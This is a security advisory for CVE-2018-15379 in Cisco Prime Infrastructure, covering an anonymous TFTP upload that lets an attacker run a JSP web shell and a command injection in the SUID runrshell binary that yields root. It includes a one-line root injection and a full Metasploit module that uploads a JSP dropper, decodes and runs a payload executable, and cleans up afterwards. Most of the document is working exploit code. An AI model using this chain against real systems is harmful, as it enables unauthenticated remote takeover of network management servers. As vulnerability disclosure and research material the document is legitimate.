Vulnerabilities Summary

Cisco Prime Infrastructure (CPI) contains two vulnerabilities that when exploited allow an unauthenticated attacker to achieve root privileges and execute code remotely. The first vulnerability is a file upload vulnerability that allows the attacker to upload and execute JSP files as the Apache Tomcat user. The second vulnerability is a privilege escalation to root by bypassing execution restrictions in a SUID binary.

Vendor Response

Cisco has issued an advisory, https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp, which provides a workaround and a fix for the vulnerability. From our assessment the provided fix only addresses the file uploading part of the exploit, not the file inclusion, the ability to execute arbitrary code through it or the privileges escalation issue that the product has.

CVE

CVE-2018-15379

Credit

An independent security researcher, Pedro Ribeiro, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.



Affected systems

Cisco Prime Infrastructure 3.2 and newer

Vulnerability Details

First Vulnerability: Arbitrary file upload and execution via tftp and Apache Tomcat

Attack Vector: Remote

Constraints: None

Most web applications running on the CPI virtual appliance are deployed under /opt/CSCOlumos/apache-tomcat-<VERSION>/webapps. One of these applications is “swimtemp”, which symlinks to /localdisk/tftp:

ade # ls -l /opt/CSCOlumos/apache-tomcat-8.5.14/webapps/ total 16 drwxrwxr-x. 3 root gadmin 4096 Mar 29 19:49 ROOT drwxrwxr-x. 8 root gadmin 4096 Mar 29 21:44 SSO lrwxrwxrwx. 1 root gadmin 36 Mar 29 21:32 SSO.war -> /opt/CSCOlumos/wars/SSO-13.0.201.war drwxrwxr-x. 4 root gadmin 4096 Mar 29 21:45 ifm_poap_rest lrwxrwxrwx. 1 root gadmin 45 Mar 29 21:32 ifm_poap_rest.war -> /opt/CSCOlumos/wars/ifm_poap_rest-3.70.21.war lrwxrwxrwx. 1 root gadmin 16 Mar 29 19:49 swimtemp -> /localdisk/tftp/ drwxrwxr-x. 22 root gadmin 4096 May 2 15:20 webacsc lrwxrwxrwx. 1 root gadmin 30 Mar 29 21:32 webacs.war -> /opt/CSCOlumos/wars/webacs.war

As the name implies, this is the directory used by TFTP to store files. Cisco has also enabled the upload of files to this directory as TFTPD is started with the -c (file create) flag, and it accepts anonymous connections:

/usr/sbin/in.tftpd --ipv4 -vv -c --listen -u prime -a :69 --retransmit 6000000 -s /localdisk/tftp

The TFTPD port (69) is also open to the world in the virtual appliance firewall, so it is trivial to upload a JSP web shell file using a tftp client to the /localdisk/tftp/ directory.

The web shell will then be available at https://<IP>/swimtemp/<SHELL>, and it will execute as the “prime” user, which is an unprivileged user that runs the Apache Tomcat server.

Second Vulnerability: runrshell Command Injection with root privileges

Attack Vector: Local

Constraints: None

The CPI virtual appliance contains a binary at /opt/CSCOlumos/bin/runrshell, which has the SUID bit set and executes as root. It is supposed to start a restricted shell that can only execute commands in /opt/CSCOlumos/rcmds. The decompilation of this function is shown below:

int main(int argc, char* argv, char* envp) { char dest; int i; setuid(0); setgid(0); setenv("PATH", "/opt/CSCOlumos/rcmds", 1); memcpy(&dest, "/bin/bash -r -c \"", 0x12uLL); for ( i = 1; argc - 1 >= i; ++i ) { strcat(&dest, argv[i]); strcat(&dest, " "); } strcat(&dest, "\""); return (system(&dest) & 0xFF00) >> 8; }

As it can be seen above, the binary uses the system() function to execute:

/bin/bash -r -c “<CMD>”. with the PATH set to /opt/CSCOlumos/rcmds, and the restricted (-r) flag passed to bash, meaning that only commands in the PATH can be executed, environment variables cannot be changed or set, directory cannot be changed, etc.

However, due to the way system() function calls “bash -c”, it is trivial to inject a command by forcing an end quote after <CMD> and the bash operator ‘&&’:

[prime@prime34 ~]$ /opt/CSCOlumos/bin/runrshell ‘” && /usr/bin/whoami #’

root

Exploit

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Cisco Prime Infrastructure Unauthenticated Remote Code Execution', 'Description' => %q{ Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow an unauthenticated attacker to achieve remote code execution. The first flaw is a file upload vulnerability that allows the attacker to upload and execute files as the Apache Tomcat user; the second is a privilege escalation to root by bypassing execution restrictions in a SUID binary. This module exploits these vulnerabilities to achieve unauthenticated remote code execution as root on the CPI default installation. This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions might also be affected, although 3.4.0.0.348 is the latest at the time of writing. }, 'Author' => [ 'Pedro Ribeiro' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', 'TODO' ], [ 'CVE', 'TODO' ], [ 'URL', 'TODO' ], [ 'URL', 'TODO' ] ], 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Cisco Prime Infrastructure', {} ] ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'TODO' )) register_options( [ OptPort.new('RPORT', [true, 'The target port', 443]), OptPort.new('RPORT_TFTP', [true, 'TFTPD port', 69]), OptBool.new('SSL', [true, 'Use SSL connection', true]), OptString.new('TARGETURI', [ true, "swimtemp path", '/swimtemp']) ]) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'swimtemp'), 'method' => 'GET' }) if res && res.code == 404 && res.body.length == 0 # at the moment this is the best way to detect # a 404 in swimtemp only returns the error code with a body length of 0, # while a 404 to another webapp or to the root returns code plus a body with content return Exploit::CheckCode::Detected else return Exploit::CheckCode::Unknown end end def upload_payload(payload) lport = datastore['LPORT'] || (1025 + rand(0xffff-1025)) lhost = datastore['LHOST'] || "0.0.0.0" remote_file = rand_text_alpha(rand(14) + 5) + '.jsp' tftp_client = Rex::Proto::TFTP::Client.new( "LocalHost" => lhost, "LocalPort" => lport, "PeerHost" => rhost, "PeerPort" => datastore['RPORT_TFTP'], "LocalFile" => "DATA:#{payload}", "RemoteFile" => remote_file, "Mode" => 'octet', "Context" => {'Msf' => self.framework, 'MsfExploit' => self}, "Action" => :upload ) print_status "Uploading TFTP payload to #{rhost}:#{datastore['TFTP_PORT']} as '#{remote_file}'" tftp_client.send_write_request remote_file end def generate_jsp_payload exe = generate_payload_exe base64_exe = Rex::Text.encode_base64(exe) native_payload_name = rand_text_alpha(rand(6)+3) var_raw = rand_text_alpha(rand(8) + 3) var_ostream = rand_text_alpha(rand(8) + 3) var_pstream = rand_text_alpha(rand(8) + 3) var_buf = rand_text_alpha(rand(8) + 3) var_decoder = rand_text_alpha(rand(8) + 3) var_tmp = rand_text_alpha(rand(8) + 3) var_path = rand_text_alpha(rand(8) + 3) var_tmp2 = rand_text_alpha(rand(8) + 3) var_path2 = rand_text_alpha(rand(8) + 3) var_proc2 = rand_text_alpha(rand(8) + 3) var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3) chmod = %Q| Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path} + " " + #{var_path2}); Thread.sleep(200); | var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3) cleanup = %Q| Thread.sleep(200); Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path} + " " + #{var_path2}); | jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% try { String #{var_buf} = "#{base64_exe}"; BASE64Decoder #{var_decoder} = new BASE64Decoder(); byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".bin"); String #{var_path} = #{var_tmp}.getAbsolutePath(); BufferedOutputStream #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); File #{var_tmp2} = File.createTempFile("#{native_payload_name}", ".sh"); String #{var_path2} = #{var_tmp2}.getAbsolutePath(); PrintWriter #{var_pstream} = new PrintWriter(new FileOutputStream(#{var_path2})); #{var_pstream}.println("!#/bin/sh"); #{var_pstream}.println("/opt/CSCOlumos/bin/runrshell '\\" && " + #{var_path} + " #'"); #{var_pstream}.close(); #{chmod} Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2}); #{cleanup} } catch (Exception e) { } %> | jsp = jsp.gsub(/

/, '') jsp = jsp.gsub(/\t/, '') jsp = jsp.gsub(/\x0d\x0a/, "") jsp = jsp.gsub(/\x0a/, "") return jsp end def exploit jsp_payload = generate_jsp_payload jsp_name = upload_payload(jsp_payload) # we land in /opt/CSCOlumos, so we don't know the apache directory # as it changes between versions... so leave this commented for now # ... and try to find a good way to clean it later # register_files_for_cleanup(jsp_name) print_status("#{peer} - Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_name), 'method' => 'GET' }) handler end end